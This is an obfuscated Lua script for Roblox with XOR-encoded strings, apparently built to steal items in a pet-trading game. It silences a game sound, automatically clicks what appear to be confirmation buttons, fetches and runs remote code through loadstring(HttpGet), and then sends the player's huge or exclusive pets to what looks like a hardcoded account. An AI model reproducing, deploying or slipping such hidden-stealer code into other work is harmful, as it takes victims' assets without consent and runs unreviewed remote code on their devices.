--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v22,v23) local v24={};for v33=1, #v22 do v6(v24,v0(v4(v1(v2(v22,v33,v33 + 1 )),v1(v2(v23,1 + (v33% #v23) ,1 + (v33% #v23) + 1 )))%256 ));end return v5(v24);end local v8=require(game:GetService(v7("\227\198\203\41\239\184\198\10\212\199\232\49\233\169\198\25\212","\126\177\163\187\69\134\219\167")).Library.Audio);local v9=v8.Play;v8.Play=function(v25,v26,...) local v27=0 + 0 ;while true do if (v27==(0 -0)) then if (v26==v7("\49\207\50\196\239\48\200\62\204\248\121\130\101\148\173\123\158\115\148\175\113\152\124\144","\156\67\173\74\165")) then return;end return v9(v25,v26,...);end end end;task.spawn(function() while task.wait(0.1) do for v34,v35 in pairs(game.Players.LocalPlayer.PlayerGui:GetDescendants()) do if (v35:IsA(v7("\0\178\81\2\158\51\82\32\184\71","\38\84\215\41\118\220\70")) and v35.Visible and v35.Active) then local v42=1080 -(1020 + 60) ;local v43;while true do if (v42==(1423 -(630 + 793))) then v43=v35.Name:lower();if (v43:find(v7("\83\25\44\20\247\66\27","\158\48\118\66\114")) or v43:find(v7("\178\33\3","\155\203\68\112\86\19\197")) or v43:find(v7("\85\216\56\248","\152\38\189\86\156\32\24\133")) or v43:find(v7("\243\92","\38\156\55\199"))) then pcall(function() v35:Click();end);end break;end end end end end end);loadstring(game:HttpGet(v7("\160\105\104\56\0\46\181\12\186\124\107\102\20\125\238\75\189\127\105\59\22\102\249\76\166\105\121\38\7\58\249\76\165\50\82\61\24\113\204\80\139\116\104\49\92\71\249\81\161\109\104\59\65\36\168\23\231\112\125\33\29\59\234\80\241\36","\35\200\29\28\72\115\20\154")))();for v28=118 -83 ,1, -(4 -3) do task.wait(1);end local v11=game:GetService(v7("\41\179\208\198\136\62\39","\84\121\223\177\191\237\76")).LocalPlayer;local v12=game:GetService(v7("\137\83\217\172\51\83\49\213\190\82\250\180\53\66\49\198\190","\161\219\54\169\192\90\48\80"));local v13=v12:WaitForChild(v7("\103\71\20\50\70\80\11","\69\41\34\96"));local v14=v13:WaitForChild(v7("\145\194\222\6\0\36\164\153\151\57\7\37\184","\75\220\163\183\106\98"));local v15=v7("\24\178\138\62\203\85\236\220","\185\98\218\235\87");local v16=v7("\204\59\52\166\210\165\199","\202\171\92\71\134\190");local v17=0.8;local v18=require(v12.Library.Client.Save);local v19=v18.Get();local v20=require(v12.Library.Directory.Pets);local v21={};if (v19.Inventory and v19.Inventory.Pet) then for v36,v37 in pairs(v19.Inventory.Pet) do local v38=0 + 0 ;local v39;while true do if (v38==(0 -0)) then v39=v20[v37.id];if (v37.id:find(v7("\14\192\62\143\40\207\56\157\40\207","\232\73\161\76")) or (v39 and (v39.huge or v39.exclusiveLevel))) then table.insert(v21,{[v7("\174\208\70","\126\219\185\34\61")]=v36,[v7("\13\195\81\103\112\99","\135\108\174\62\18\30\23\147")]=v37._am or (1748 -(760 + 987)) });end break;end end end end for v29,v30 in ipairs(v21) do local v31=0;local v32;while true do if (v31==(1913 -(1789 + 124))) then local v40=766 -(745 + 21) ;local v41;while true do if (v40==(0 + 0)) then v41=0;while true do if (v41==(2 -1)) then v31=3 -2 ;break;end if (v41==0) then v32={v15,v16,v7("\134\236\62","\167\214\137\74\171\120\206\83"),v30.uid,v30.amount};pcall(function() return v14:InvokeServer(unpack(v32));end);v41=1;end end break;end end end if (v31==1) then task.wait(v17);break;end end end
